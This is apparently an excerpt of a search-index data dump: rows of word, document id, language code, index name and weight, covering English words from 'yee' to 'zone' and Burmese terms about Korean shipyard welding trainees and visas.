('yee', 121, 'en', 'node_search', 56),
('yee', 121, 'ja', 'node_search', 62),
('yen', 162, 'en', 'node_search', 2.94216),
('yet', 10, 'en', 'help_search', 1),
('yet', 10, 'ja', 'help_search', 1),
('yet', 10, 'ko', 'help_search', 1),
('yet', 33, 'en', 'help_search', 1),
('yet', 33, 'ja', 'help_search', 1),
('yet', 33, 'ko', 'help_search', 1),
('yet', 40, 'en', 'help_search', 1),
('yet', 40, 'ja', 'help_search', 1),
('yet', 40, 'ko', 'help_search', 1),
('yin', 132, 'en', 'node_search', 28),
('yin', 132, 'ja', 'node_search', 31),
('yml', 30, 'en', 'help_search', 0.993146),
('yml', 30, 'ja', 'help_search', 0.993146),
('yml', 30, 'ko', 'help_search', 0.993146),
('you', 1, 'en', 'help_search', 6),
('you', 1, 'en', 'node_search', 4),
('you', 1, 'ja', 'help_search', 6),
('you', 1, 'ko', 'help_search', 6),
('you', 2, 'en', 'help_search', 4),
('you', 2, 'ja', 'help_search', 4),
('you', 2, 'ko', 'help_search', 4),
('you', 3, 'en', 'help_search', 3),
('you', 3, 'en', 'node_search', 9.97286),
('you', 3, 'ja', 'help_search', 3),
('you', 3, 'ko', 'help_search', 3),
('you', 3, 'ko', 'node_search', 9.95813),
('you', 4, 'en', 'help_search', 2),
('you', 4, 'ja', 'help_search', 2),
('you', 4, 'ko', 'help_search', 2),
('you', 5, 'en', 'help_search', 1),
('you', 5, 'ja', 'help_search', 1),
('you', 5, 'ko', 'help_search', 1),
('you', 6, 'en', 'help_search', 0.972861),
('you', 6, 'ja', 'help_search', 0.972861),
('you', 6, 'ko', 'help_search', 0.972861),
('you', 7, 'en', 'help_search', 6.91674),
('you', 7, 'ja', 'help_search', 6.91674),
('you', 7, 'ko', 'help_search', 6.91674),
('you', 8, 'en', 'help_search', 2),
('you', 8, 'ja', 'help_search', 2),
('you', 8, 'ko', 'help_search', 2),
('you', 9, 'en', 'help_search', 6),
('you', 9, 'ja', 'help_search', 6),
('you', 9, 'ko', 'help_search', 6),
('you', 10, 'en', 'help_search', 3),
('you', 10, 'ja', 'help_search', 3),
('you', 10, 'ko', 'help_search', 3),
('you', 11, 'en', 'help_search', 3.8894),
('you', 11, 'ja', 'help_search', 3.8894),
('you', 11, 'ko', 'help_search', 3.8894),
('you', 13, 'en', 'help_search', 1),
('you', 13, 'ja', 'help_search', 1),
('you', 13, 'ko', 'help_search', 1),
('you', 14, 'en', 'help_search', 2),
('you', 14, 'ja', 'help_search', 2),
('you', 14, 'ko', 'help_search', 2),
('you', 15, 'en', 'help_search', 2),
('you', 15, 'ja', 'help_search', 2),
('you', 15, 'ko', 'help_search', 2),
('you', 16, 'en', 'help_search', 3),
('you', 16, 'ja', 'help_search', 3),
('you', 16, 'ko', 'help_search', 3),
('you', 17, 'en', 'help_search', 4),
('you', 17, 'ja', 'help_search', 4),
('you', 17, 'ko', 'help_search', 4),
('you', 18, 'en', 'help_search', 1),
('you', 18, 'ja', 'help_search', 1),
('you', 18, 'ko', 'help_search', 1),
('you', 19, 'en', 'help_search', 2),
('you', 19, 'ja', 'help_search', 2),
('you', 19, 'ko', 'help_search', 2),
('you', 20, 'en', 'help_search', 1),
('you', 20, 'ja', 'help_search', 1),
('you', 20, 'ko', 'help_search', 1),
('you', 21, 'en', 'help_search', 1),
('you', 21, 'ja', 'help_search', 1),
('you', 21, 'ko', 'help_search', 1),
('you', 22, 'en', 'help_search', 4.91448),
('you', 22, 'ja', 'help_search', 4.91448),
('you', 22, 'ko', 'help_search', 4.91448),
('you', 23, 'en', 'help_search', 12.7711),
('you', 23, 'ja', 'help_search', 12.7711),
('you', 23, 'ko', 'help_search', 12.7711),
('you', 24, 'en', 'help_search', 8),
('you', 24, 'en', 'node_search', 1.54346),
('you', 24, 'ja', 'help_search', 8),
('you', 24, 'ko', 'help_search', 8),
('you', 25, 'en', 'help_search', 6),
('you', 25, 'ja', 'help_search', 6),
('you', 26, 'en', 'help_search', 4),
('you', 26, 'ja', 'help_search', 4),
('you', 26, 'ko', 'help_search', 4),
('you', 27, 'en', 'help_search', 11),
('you', 27, 'ja', 'help_search', 11),
('you', 27, 'ko', 'help_search', 11),
('you', 28, 'en', 'help_search', 4.18461),
('you', 28, 'en', 'node_search', 1),
('you', 28, 'ja', 'help_search', 4.18461),
('you', 28, 'ko', 'help_search', 4.18461),
('you', 29, 'en', 'help_search', 1.97685),
('you', 29, 'en', 'node_search', 3),
('you', 29, 'ja', 'help_search', 1.97685),
('you', 29, 'ko', 'help_search', 1.97685),
('you', 31, 'en', 'node_search', 2.8333),
('you', 31, 'ja', 'help_search', 6.57496),
('you', 32, 'en', 'help_search', 10.9946),
('you', 32, 'ja', 'help_search', 10.9946),
('you', 32, 'ko', 'help_search', 10.9946),
('you', 33, 'en', 'help_search', 3),
('you', 33, 'ja', 'help_search', 3),
('you', 33, 'ko', 'help_search', 3),
('you', 34, 'en', 'help_search', 1),
('you', 34, 'ja', 'help_search', 1),
('you', 34, 'ko', 'help_search', 1),
('you', 35, 'en', 'help_search', 1),
('you', 35, 'ja', 'help_search', 1),
('you', 35, 'ko', 'help_search', 1),
('you', 37, 'en', 'help_search', 1.74636),
('you', 37, 'ja', 'help_search', 1.74636),
('you', 37, 'ko', 'help_search', 1.74636),
('you', 38, 'en', 'help_search', 1),
('you', 38, 'ja', 'help_search', 1),
('you', 38, 'ko', 'help_search', 1),
('you', 39, 'en', 'help_search', 5),
('you', 39, 'ja', 'help_search', 5),
('you', 39, 'ko', 'help_search', 5),
('you', 40, 'en', 'help_search', 1),
('you', 40, 'ja', 'help_search', 1),
('you', 40, 'ko', 'help_search', 1),
('you', 41, 'en', 'help_search', 5),
('you', 41, 'ja', 'help_search', 5),
('you', 41, 'ko', 'help_search', 5),
('you', 42, 'en', 'help_search', 1),
('you', 42, 'ja', 'help_search', 1),
('you', 42, 'ko', 'help_search', 1),
('you', 43, 'en', 'help_search', 3),
('you', 43, 'ja', 'help_search', 3),
('you', 43, 'ko', 'help_search', 3),
('you', 45, 'en', 'help_search', 1),
('you', 45, 'ja', 'help_search', 1),
('you', 45, 'ko', 'help_search', 1),
('you', 46, 'en', 'help_search', 1.98902),
('you', 46, 'ja', 'help_search', 1.98902),
('you', 46, 'ko', 'help_search', 1.98902),
('you', 47, 'en', 'help_search', 1),
('you', 47, 'ja', 'help_search', 1),
('you', 47, 'ko', 'help_search', 1),
('you', 49, 'en', 'help_search', 2),
('you', 49, 'ja', 'help_search', 2),
('you', 49, 'ko', 'help_search', 2),
('you', 50, 'en', 'help_search', 4),
('you', 50, 'ja', 'help_search', 4),
('you', 50, 'ko', 'help_search', 4),
('you', 51, 'en', 'help_search', 1),
('you', 51, 'ja', 'help_search', 1),
('you', 51, 'ko', 'help_search', 1),
('you', 52, 'en', 'help_search', 2),
('you', 52, 'ja', 'help_search', 2),
('you', 52, 'ko', 'help_search', 2),
('you', 53, 'en', 'help_search', 1),
('you', 53, 'ja', 'help_search', 1),
('you', 53, 'ko', 'help_search', 1),
('you', 54, 'en', 'help_search', 5),
('you', 54, 'ja', 'help_search', 5),
('you', 54, 'ko', 'help_search', 5),
('you', 55, 'en', 'help_search', 2),
('you', 55, 'ja', 'help_search', 2),
('you', 55, 'ko', 'help_search', 2),
('you', 56, 'en', 'help_search', 3),
('you', 56, 'ja', 'help_search', 3),
('you', 56, 'ko', 'help_search', 3),
('you', 57, 'en', 'help_search', 1),
('you', 57, 'ja', 'help_search', 1),
('you', 57, 'ko', 'help_search', 1),
('you', 58, 'en', 'help_search', 1),
('you', 58, 'ja', 'help_search', 1),
('you', 58, 'ko', 'help_search', 1),
('you', 59, 'en', 'help_search', 3),
('you', 59, 'ja', 'help_search', 3),
('you', 59, 'ko', 'help_search', 3),
('you', 60, 'en', 'help_search', 5),
('you', 60, 'ja', 'help_search', 5),
('you', 60, 'ko', 'help_search', 5),
('you', 61, 'en', 'help_search', 1),
('you', 61, 'ja', 'help_search', 1),
('you', 61, 'ko', 'help_search', 1),
('you', 62, 'en', 'help_search', 3),
('you', 62, 'en', 'node_search', 4),
('you', 62, 'ja', 'help_search', 3),
('you', 62, 'ko', 'help_search', 3),
('you', 63, 'en', 'help_search', 2),
('you', 63, 'ja', 'help_search', 2),
('you', 63, 'ko', 'help_search', 2),
('you', 64, 'en', 'help_search', 3),
('you', 64, 'ja', 'help_search', 3),
('you', 64, 'ko', 'help_search', 3),
('you', 65, 'en', 'help_search', 5),
('you', 65, 'ja', 'help_search', 5),
('you', 65, 'ko', 'help_search', 5),
('you', 66, 'en', 'help_search', 3),
('you', 66, 'en', 'node_search', 0.993146),
('you', 66, 'ja', 'help_search', 3),
('you', 67, 'en', 'help_search', 2.83423),
('you', 67, 'ja', 'help_search', 2.83423),
('you', 67, 'ko', 'help_search', 2.83423),
('you', 68, 'en', 'help_search', 6.3893),
('you', 68, 'ja', 'help_search', 6.3893),
('you', 68, 'ko', 'help_search', 6.3893),
('you', 69, 'en', 'help_search', 2),
('you', 69, 'en', 'node_search', 2),
('you', 69, 'ja', 'help_search', 2),
('you', 69, 'ko', 'help_search', 2),
('you', 70, 'en', 'help_search', 1),
('you', 70, 'ja', 'help_search', 1),
('you', 70, 'ko', 'help_search', 1),
('you', 71, 'en', 'help_search', 5),
('you', 71, 'ja', 'help_search', 5),
('you', 71, 'ko', 'help_search', 5),
('you', 72, 'en', 'help_search', 6.74314),
('you', 72, 'ja', 'help_search', 6.74314),
('you', 72, 'ko', 'help_search', 6.74314),
('you', 74, 'en', 'help_search', 8),
('you', 74, 'ja', 'help_search', 8),
('you', 74, 'ko', 'help_search', 8),
('you', 75, 'en', 'help_search', 6),
('you', 75, 'ja', 'help_search', 6),
('you', 75, 'ko', 'help_search', 6),
('you', 76, 'en', 'help_search', 5),
('you', 76, 'ja', 'help_search', 5),
('you', 76, 'ko', 'help_search', 5),
('you', 77, 'en', 'help_search', 7),
('you', 77, 'ja', 'help_search', 7),
('you', 77, 'ko', 'help_search', 7),
('you', 78, 'en', 'help_search', 1),
('you', 78, 'ja', 'help_search', 1),
('you', 78, 'ko', 'help_search', 1),
('you', 79, 'en', 'help_search', 10),
('you', 79, 'ja', 'help_search', 10),
('you', 79, 'ko', 'help_search', 10),
('you', 80, 'en', 'help_search', 6.9394),
('you', 80, 'ja', 'help_search', 6.9394),
('you', 80, 'ko', 'help_search', 6.9394),
('you', 81, 'en', 'help_search', 2),
('you', 81, 'ja', 'help_search', 2),
('you', 81, 'ko', 'help_search', 2),
('you', 82, 'en', 'help_search', 3),
('you', 82, 'ja', 'help_search', 3),
('you', 82, 'ko', 'help_search', 3),
('you', 83, 'en', 'help_search', 1),
('you', 83, 'ja', 'help_search', 1),
('you', 83, 'ko', 'help_search', 1),
('you', 84, 'en', 'help_search', 2),
('you', 84, 'ja', 'help_search', 2),
('you', 84, 'ko', 'help_search', 2),
('you', 86, 'en', 'help_search', 7.96229),
('you', 86, 'ja', 'help_search', 7.96229),
('you', 86, 'ko', 'help_search', 7.96229),
('you', 87, 'en', 'help_search', 3),
('you', 87, 'en', 'node_search', 2),
('you', 87, 'ja', 'help_search', 3),
('you', 87, 'ko', 'help_search', 3),
('you', 88, 'en', 'help_search', 5),
('you', 88, 'ja', 'help_search', 5),
('you', 88, 'ko', 'help_search', 5),
('you', 89, 'en', 'help_search', 4),
('you', 89, 'ja', 'help_search', 4),
('you', 89, 'ko', 'help_search', 4),
('you', 91, 'en', 'help_search', 6.99731),
('you', 91, 'ja', 'help_search', 6.99315),
('you', 91, 'ko', 'help_search', 6.99731),
('you', 92, 'en', 'help_search', 8),
('you', 92, 'ja', 'help_search', 8),
('you', 92, 'ko', 'help_search', 8),
('you', 93, 'en', 'help_search', 8.4838),
('you', 93, 'ja', 'help_search', 8.4838),
('you', 93, 'ko', 'help_search', 8.4838),
('you', 98, 'en', 'node_search', 2),
('you', 116, 'en', 'node_search', 2),
('you', 120, 'en', 'node_search', 4),
('you', 126, 'en', 'node_search', 1),
('you', 135, 'en', 'node_search', 1),
('you', 140, 'en', 'node_search', 3),
('young', 23, 'en', 'node_search', 1.76965),
('young', 80, 'en', 'node_search', 4),
('your', 1, 'en', 'help_search', 1),
('your', 1, 'en', 'node_search', 2),
('your', 1, 'ja', 'help_search', 1),
('your', 1, 'ko', 'help_search', 1),
('your', 2, 'en', 'help_search', 2),
('your', 2, 'ja', 'help_search', 2),
('your', 2, 'ko', 'help_search', 2),
('your', 4, 'en', 'help_search', 3),
('your', 4, 'ja', 'help_search', 3),
('your', 4, 'ko', 'help_search', 3),
('your', 5, 'en', 'help_search', 3),
('your', 5, 'ja', 'help_search', 3),
('your', 5, 'ko', 'help_search', 3),
('your', 6, 'en', 'help_search', 1),
('your', 6, 'ja', 'help_search', 1),
('your', 6, 'ko', 'help_search', 1),
('your', 11, 'en', 'help_search', 2),
('your', 11, 'ja', 'help_search', 2),
('your', 11, 'ko', 'help_search', 2),
('your', 12, 'en', 'help_search', 27),
('your', 12, 'ja', 'help_search', 27),
('your', 12, 'ko', 'help_search', 27),
('your', 13, 'en', 'help_search', 6),
('your', 13, 'ja', 'help_search', 6),
('your', 13, 'ko', 'help_search', 6),
('your', 14, 'en', 'help_search', 30),
('your', 14, 'ja', 'help_search', 30),
('your', 14, 'ko', 'help_search', 30),
('your', 15, 'en', 'help_search', 5),
('your', 15, 'ja', 'help_search', 5),
('your', 15, 'ko', 'help_search', 5),
('your', 16, 'en', 'help_search', 1),
('your', 16, 'ja', 'help_search', 1),
('your', 16, 'ko', 'help_search', 1),
('your', 18, 'en', 'help_search', 1),
('your', 18, 'ja', 'help_search', 1),
('your', 18, 'ko', 'help_search', 1),
('your', 19, 'en', 'help_search', 1),
('your', 19, 'ja', 'help_search', 1),
('your', 19, 'ko', 'help_search', 1),
('your', 20, 'en', 'help_search', 1),
('your', 20, 'ja', 'help_search', 1),
('your', 20, 'ko', 'help_search', 1),
('your', 22, 'en', 'help_search', 4.95373),
('your', 22, 'ja', 'help_search', 4.95373),
('your', 22, 'ko', 'help_search', 4.95373),
('your', 23, 'en', 'help_search', 2),
('your', 23, 'ja', 'help_search', 2),
('your', 23, 'ko', 'help_search', 2),
('your', 24, 'en', 'help_search', 1),
('your', 24, 'ja', 'help_search', 1),
('your', 24, 'ko', 'help_search', 1),
('your', 25, 'en', 'help_search', 2),
('your', 25, 'ja', 'help_search', 2),
('your', 26, 'en', 'help_search', 2),
('your', 26, 'ja', 'help_search', 2),
('your', 26, 'ko', 'help_search', 2),
('your', 27, 'en', 'help_search', 0.997306),
('your', 27, 'ja', 'help_search', 0.997306),
('your', 27, 'ko', 'help_search', 0.997306),
('your', 29, 'en', 'help_search', 42.1676),
('your', 29, 'ja', 'help_search', 42.1676),
('your', 29, 'ko', 'help_search', 42.1676),
('your', 30, 'en', 'help_search', 1),
('your', 30, 'ja', 'help_search', 1),
('your', 30, 'ko', 'help_search', 1),
('your', 31, 'ja', 'help_search', 8.53008),
('your', 32, 'en', 'help_search', 9),
('your', 32, 'ja', 'help_search', 9),
('your', 32, 'ko', 'help_search', 9),
('your', 33, 'en', 'help_search', 39),
('your', 33, 'ja', 'help_search', 39),
('your', 33, 'ko', 'help_search', 39),
('your', 34, 'en', 'help_search', 32),
('your', 34, 'ja', 'help_search', 32),
('your', 34, 'ko', 'help_search', 32),
('your', 35, 'en', 'help_search', 2),
('your', 35, 'ja', 'help_search', 2),
('your', 35, 'ko', 'help_search', 2),
('your', 37, 'en', 'help_search', 1.98902),
('your', 37, 'ja', 'help_search', 1.98902),
('your', 37, 'ko', 'help_search', 1.98902),
('your', 38, 'en', 'help_search', 29),
('your', 38, 'ja', 'help_search', 29),
('your', 38, 'ko', 'help_search', 29),
('your', 39, 'en', 'help_search', 3),
('your', 39, 'ja', 'help_search', 3),
('your', 39, 'ko', 'help_search', 3),
('your', 40, 'en', 'help_search', 27),
('your', 40, 'ja', 'help_search', 27),
('your', 40, 'ko', 'help_search', 27),
('your', 41, 'en', 'help_search', 22),
('your', 41, 'ja', 'help_search', 22),
('your', 41, 'ko', 'help_search', 22),
('your', 43, 'en', 'help_search', 3),
('your', 43, 'ja', 'help_search', 3),
('your', 43, 'ko', 'help_search', 3),
('your', 44, 'en', 'help_search', 1),
('your', 44, 'ja', 'help_search', 1),
('your', 44, 'ko', 'help_search', 1),
('your', 45, 'en', 'help_search', 2),
('your', 45, 'ja', 'help_search', 2),
('your', 45, 'ko', 'help_search', 2),
('your', 46, 'en', 'help_search', 1),
('your', 46, 'ja', 'help_search', 1),
('your', 46, 'ko', 'help_search', 1),
('your', 48, 'en', 'help_search', 1),
('your', 48, 'ja', 'help_search', 1),
('your', 48, 'ko', 'help_search', 1),
('your', 49, 'en', 'help_search', 4),
('your', 49, 'ja', 'help_search', 4),
('your', 49, 'ko', 'help_search', 4),
('your', 50, 'en', 'help_search', 3),
('your', 50, 'ja', 'help_search', 3),
('your', 50, 'ko', 'help_search', 3),
('your', 51, 'en', 'help_search', 1),
('your', 51, 'ja', 'help_search', 1),
('your', 51, 'ko', 'help_search', 1),
('your', 52, 'en', 'help_search', 3),
('your', 52, 'ja', 'help_search', 3),
('your', 52, 'ko', 'help_search', 3),
('your', 54, 'en', 'help_search', 6),
('your', 54, 'ja', 'help_search', 6),
('your', 54, 'ko', 'help_search', 6),
('your', 56, 'en', 'help_search', 1),
('your', 56, 'ja', 'help_search', 1),
('your', 56, 'ko', 'help_search', 1),
('your', 57, 'en', 'help_search', 1),
('your', 57, 'ja', 'help_search', 1),
('your', 57, 'ko', 'help_search', 1),
('your', 58, 'en', 'help_search', 1),
('your', 58, 'ja', 'help_search', 1),
('your', 58, 'ko', 'help_search', 1),
('your', 59, 'en', 'help_search', 2),
('your', 59, 'ja', 'help_search', 2),
('your', 59, 'ko', 'help_search', 2),
('your', 60, 'en', 'help_search', 1),
('your', 60, 'ja', 'help_search', 1),
('your', 60, 'ko', 'help_search', 1),
('your', 62, 'en', 'help_search', 1),
('your', 62, 'en', 'node_search', 7.81092),
('your', 62, 'ja', 'help_search', 1),
('your', 62, 'ko', 'help_search', 1),
('your', 64, 'en', 'help_search', 1),
('your', 64, 'ja', 'help_search', 1),
('your', 64, 'ko', 'help_search', 1),
('your', 65, 'en', 'help_search', 4),
('your', 65, 'ja', 'help_search', 4),
('your', 65, 'ko', 'help_search', 4),
('your', 66, 'en', 'help_search', 1),
('your', 66, 'en', 'node_search', 4.97685),
('your', 66, 'ja', 'help_search', 1),
('your', 67, 'en', 'help_search', 2),
('your', 67, 'ja', 'help_search', 2),
('your', 67, 'ko', 'help_search', 2),
('your', 68, 'en', 'help_search', 1.80822),
('your', 68, 'ja', 'help_search', 1.80822),
('your', 68, 'ko', 'help_search', 1.80822),
('your', 69, 'en', 'help_search', 5.99731),
('your', 69, 'ja', 'help_search', 5.99731),
('your', 69, 'ko', 'help_search', 5.99731),
('your', 70, 'en', 'help_search', 4),
('your', 70, 'ja', 'help_search', 4),
('your', 70, 'ko', 'help_search', 4),
('your', 71, 'en', 'help_search', 4),
('your', 71, 'ja', 'help_search', 4),
('your', 71, 'ko', 'help_search', 4),
('your', 72, 'en', 'help_search', 5.96178),
('your', 72, 'ja', 'help_search', 5.96178),
('your', 72, 'ko', 'help_search', 5.96178),
('your', 73, 'en', 'help_search', 5),
('your', 73, 'ja', 'help_search', 5),
('your', 73, 'ko', 'help_search', 5),
('your', 74, 'en', 'help_search', 2),
('your', 74, 'ja', 'help_search', 2),
('your', 74, 'ko', 'help_search', 2),
('your', 75, 'en', 'help_search', 1),
('your', 75, 'ja', 'help_search', 1),
('your', 75, 'ko', 'help_search', 1),
('your', 76, 'en', 'help_search', 32),
('your', 76, 'ja', 'help_search', 32),
('your', 76, 'ko', 'help_search', 32),
('your', 77, 'en', 'help_search', 3),
('your', 77, 'en', 'node_search', 8),
('your', 77, 'ja', 'help_search', 3),
('your', 77, 'ko', 'help_search', 3),
('your', 79, 'en', 'help_search', 2),
('your', 79, 'ja', 'help_search', 2),
('your', 79, 'ko', 'help_search', 2),
('your', 80, 'en', 'help_search', 0.997306),
('your', 80, 'ja', 'help_search', 0.997306),
('your', 80, 'ko', 'help_search', 0.997306),
('your', 83, 'en', 'help_search', 1),
('your', 83, 'ja', 'help_search', 1),
('your', 83, 'ko', 'help_search', 1),
('your', 84, 'en', 'help_search', 2),
('your', 84, 'ja', 'help_search', 2),
('your', 84, 'ko', 'help_search', 2),
('your', 86, 'en', 'help_search', 4.99731),
('your', 86, 'ja', 'help_search', 4.99731),
('your', 86, 'ko', 'help_search', 4.99731),
('your', 87, 'en', 'node_search', 1),
('your', 88, 'en', 'help_search', 2),
('your', 88, 'ja', 'help_search', 2),
('your', 88, 'ko', 'help_search', 2),
('your', 90, 'en', 'help_search', 3),
('your', 90, 'ja', 'help_search', 3),
('your', 90, 'ko', 'help_search', 3),
('your', 91, 'en', 'help_search', 4.98493),
('your', 91, 'ja', 'help_search', 4.98087),
('your', 91, 'ko', 'help_search', 4.98493),
('your', 92, 'en', 'help_search', 3.99731),
('your', 92, 'ja', 'help_search', 3.99731),
('your', 92, 'ko', 'help_search', 3.99731),
('your', 93, 'en', 'help_search', 1),
('your', 93, 'ja', 'help_search', 1),
('your', 93, 'ko', 'help_search', 1),
('your', 116, 'en', 'node_search', 1),
('your', 126, 'en', 'node_search', 1),
('your', 135, 'en', 'node_search', 1),
('your', 140, 'en', 'node_search', 4),
('yourselves', 5, 'en', 'node_search', 1),
('yourselves', 5, 'ko', 'node_search', 1),
('youth', 26, 'en', 'node_search', 1),
('youth', 27, 'en', 'node_search', 1),
('yuya', 187, 'en', 'node_search', 6),
('yuya', 187, 'ja', 'node_search', 3.96276),
('zar', 70, 'en', 'node_search', 1),
('zar', 70, 'ja', 'node_search', 1),
('zar', 88, 'en', 'node_search', 2),
('zar', 88, 'ja', 'node_search', 2),
('zar', 103, 'en', 'node_search', 2),
('zar', 103, 'ja', 'node_search', 2),
('zar', 141, 'en', 'node_search', 28),
('zar', 141, 'ja', 'node_search', 31),
('zaw', 85, 'en', 'node_search', 31),
('zaw', 85, 'ja', 'node_search', 31),
('zaw', 100, 'en', 'node_search', 31),
('zaw', 100, 'ja', 'node_search', 31),
('zaw', 127, 'en', 'node_search', 28),
('zaw', 127, 'ja', 'node_search', 31),
('zaw', 184, 'en', 'node_search', 2),
('zaw', 184, 'ja', 'node_search', 1.76188),
('zaw', 194, 'en', 'node_search', 6),
('zaw', 194, 'ja', 'node_search', 4.00925),
('zayya', 23, 'en', 'node_search', 1),
('zayya', 27, 'en', 'node_search', 6.08802),
('zeya', 23, 'en', 'node_search', 1),
('zeya', 27, 'en', 'node_search', 5.05448),
('zin', 77, 'en', 'node_search', 10),
('zin', 77, 'ja', 'node_search', 10),
('zin', 91, 'en', 'node_search', 4),
('zin', 91, 'ja', 'node_search', 4),
('zin', 130, 'en', 'node_search', 2),
('zin', 130, 'ja', 'node_search', 2),
('zin', 131, 'en', 'node_search', 28),
('zin', 131, 'ja', 'node_search', 31),
('zin', 132, 'en', 'node_search', 28),
('zin', 132, 'ja', 'node_search', 31),
('zin', 134, 'en', 'node_search', 1),
('zin', 134, 'ja', 'node_search', 1),
('zin', 144, 'en', 'node_search', 31),
('zin', 144, 'ja', 'node_search', 31),
('zin', 145, 'en', 'node_search', 1),
('zin', 145, 'ja', 'node_search', 1),
('zin', 147, 'en', 'node_search', 34),
('zin', 147, 'ja', 'node_search', 34),
('zin', 153, 'en', 'node_search', 2),
('zin', 153, 'ja', 'node_search', 2),
('zin', 157, 'en', 'node_search', 1),
('zin', 157, 'ja', 'node_search', 1),
('zin', 167, 'en', 'node_search', 1),
('zin', 167, 'ja', 'node_search', 1),
('zin', 174, 'en', 'node_search', 2),
('zin', 174, 'ja', 'node_search', 1.72283),
('zin', 199, 'en', 'node_search', 6),
('zin', 199, 'ja', 'node_search', 4.01872),
('zone', 71, 'en', 'help_search', 2),
('zone', 71, 'ja', 'help_search', 2),
('zone', 71, 'ko', 'help_search', 2),
('ကနေ', 7, 'ko', 'node_search', 2),
('ကိုရီးယားနိုင်ငံရှိ', 6, 'ko', 'node_search', 29),
('ကိုရီးယားမှ', 6, 'ko', 'node_search', 29),
('ကုန်ကျစရိတ်များ', 8, 'ko', 'node_search', 2),
('ကျန်နိုင်ပါသည်', 8, 'ko', 'node_search', 2),
('ကျန်းမာရေးအာမခံနှင့်', 8, 'ko', 'node_search', 2),
('ကျွမ်းကျင်', 8, 'ko', 'node_search', 27),
('ဂဟေဆော်', 6, 'ko', 'node_search', 29),
('ဂဟေဆော်', 9, 'ko', 'node_search', 28),
('ဂဟေဆော်ပညာရှင်', 8, 'ko', 'node_search', 27),
('စစ်ဆေးနိုင်ဖို့', 6, 'ko', 'node_search', 29),
('စာမေးပွဲ', 6, 'ko', 'node_search', 29),
('စားသောက်စရိတ်', 8, 'ko', 'node_search', 2),
('ဆက်သွယ်ရေး', 9, 'ko', 'node_search', 1),
('ဆက်သွယ်ရေးဝန်ကြီးဌာနမှ', 9, 'ko', 'node_search', 27),
('ဆင်မလိုက်', 9, 'ko', 'node_search', 28),
('ဆင်မလိုက်သင်္ဘောကျင်းမှ', 17, 'ko', 'node_search', 29),
('ဌာနမှ', 17, 'ko', 'node_search', 29),
('တစ်နေ့', 8, 'ko', 'node_search', 2),
('တတ်ကျွမ်းနားလည်တဲ့', 7, 'ko', 'node_search', 2),
('တာဝန်ထမ်းဆောင်နေတဲ့သူတွေ', 7, 'ko', 'node_search', 2),
('တွေနဲ့', 7, 'ko', 'node_search', 2),
('ထပ်ခွဲထားပါသေးတယ်', 7, 'ko', 'node_search', 2),
('ဒါမှမဟုတ်', 7, 'ko', 'node_search', 2),
('ဒုဝန်ကြီးမှ', 9, 'ko', 'node_search', 28),
('ဒုဝန်ကြီးမှလာရောက်တွေ့ဆုံ', 17, 'ko', 'node_search', 29),
('နည်းပညာ', 7, 'ko', 'node_search', 2),
('နည်းပညာပိုင်းဆိုင်ရာ', 7, 'ko', 'node_search', 2),
('နယ်ပယ်တခုခုမှာ', 7, 'ko', 'node_search', 2),
('နယ်ပယ်မှာ', 7, 'ko', 'node_search', 2),
('နာရီနှင့်', 8, 'ko', 'node_search', 2),
('နိုင်ငံခြား', 7, 'ko', 'node_search', 2),
('နိုင်ငံသား', 7, 'ko', 'node_search', 2),
('နဲ့', 6, 'ko', 'node_search', 29),
('နှုတ်ပြီးလျှင်', 8, 'ko', 'node_search', 2),
('ပညာရှင်', 7, 'ko', 'node_search', 2),
('ပညာရှင်တွေကို', 7, 'ko', 'node_search', 2),
('ပညာရှင်ဗီဇာပါ', 7, 'ko', 'node_search', 2),
('ပထမအသုတ်', 9, 'ko', 'node_search', 28),
('ပထမအသုတ်ဂဟေဆော်သင်တန်းသားများအား', 17, 'ko', 'node_search', 29),
('ပိုင်းဆိုင်ရာ', 7, 'ko', 'node_search', 2),
('ပို့ဆောင်ရေးနှင့်', 9, 'ko', 'node_search', 28),
('ပို့ဆောင်ရေးနှင့်ဆက်သွယ်ရေးဝန်ကြီး', 17, 'ko', 'node_search', 29),
('ပေးတယ်လို့လည်း', 7, 'ko', 'node_search', 2),
('ပေးတဲ့', 7, 'ko', 'node_search', 2),
('ပြောကြား', 6, 'ko', 'node_search', 4),
('ပြောကြားပေးပြီး', 9, 'ko', 'node_search', 3),
('ပြောင်းလာရင်', 7, 'ko', 'node_search', 2),
('ဖြစ်ပါတယ်တဲ့', 7, 'ko', 'node_search', 2),
('ဗီဇာပါ', 7, 'ko', 'node_search', 6),
('ဗီဇာလည်း', 7, 'ko', 'node_search', 2),
('များသောအားဖြင့်', 7, 'ko', 'node_search', 2),
('မြန်မာငွေ', 8, 'ko', 'node_search', 2),
('ရက်လောက်ဆင်း', 8, 'ko', 'node_search', 2),
('ရရှိတဲ့', 7, 'ko', 'node_search', 6),
('ရရှိမည့်ငွေနှင့်', 8, 'ko', 'node_search', 2),
('ရှင်းလင်း', 6, 'ko', 'node_search', 29),
('လာရောက်', 6, 'ko', 'node_search', 29),
('လာရောက်စစ်ဆေးစဉ်', 9, 'ko', 'node_search', 2),
('လာရောက်စစ်ဆေးသည်', 9, 'ko', 'node_search', 1),
('လာရောက်တွေ့ဆုံ', 9, 'ko', 'node_search', 3),
('လိုအပ်သည်များကို', 6, 'ko', 'node_search', 29),
('လုပ်ကိုင်နေသူတွေ', 7, 'ko', 'node_search', 2),
('လုပ်ကိုင်လိုသူများ', 8, 'ko', 'node_search', 27),
('လုပ်သက်', 7, 'ko', 'node_search', 2),
('လုပ်သားတွေ', 7, 'ko', 'node_search', 2),
('ဝန်ကြီးဌာနမှ', 9, 'ko', 'node_search', 1),
('သင်တန်းကျောင်းအား', 9, 'ko', 'node_search', 3),
('သင်တန်းကျောင်းအားလာရောက်စစ်ဆေးစဉ်', 17, 'ko', 'node_search', 29),
('သင်တန်းသားများကို', 6, 'ko', 'node_search', 29),
('သင်တန်းသားများအား', 9, 'ko', 'node_search', 28),
('သင်္ဘောကျင်းကို', 6, 'ko', 'node_search', 29),
('သင်္ဘောကျင်းတွင်', 8, 'ko', 'node_search', 27),
('သင်္ဘောကျင်းမှ', 9, 'ko', 'node_search', 28),
('သိန်း', 8, 'ko', 'node_search', 2),
('သိရပါတယ်', 7, 'ko', 'node_search', 2),
('သွားရောက်', 8, 'ko', 'node_search', 27),
('သွားရောက်နိုင်ဖို့', 6, 'ko', 'node_search', 29),
('အခြားနေထိုင်', 8, 'ko', 'node_search', 2),
('အတွေ့ကြုံရှိ', 7, 'ko', 'node_search', 4),
('အထူးစွမ်းရည်ဗီဇာပါ', 7, 'ko', 'node_search', 2),
('အဖြစ်', 8, 'ko', 'node_search', 27),
('အမျိုးစား', 7, 'ko', 'node_search', 2),
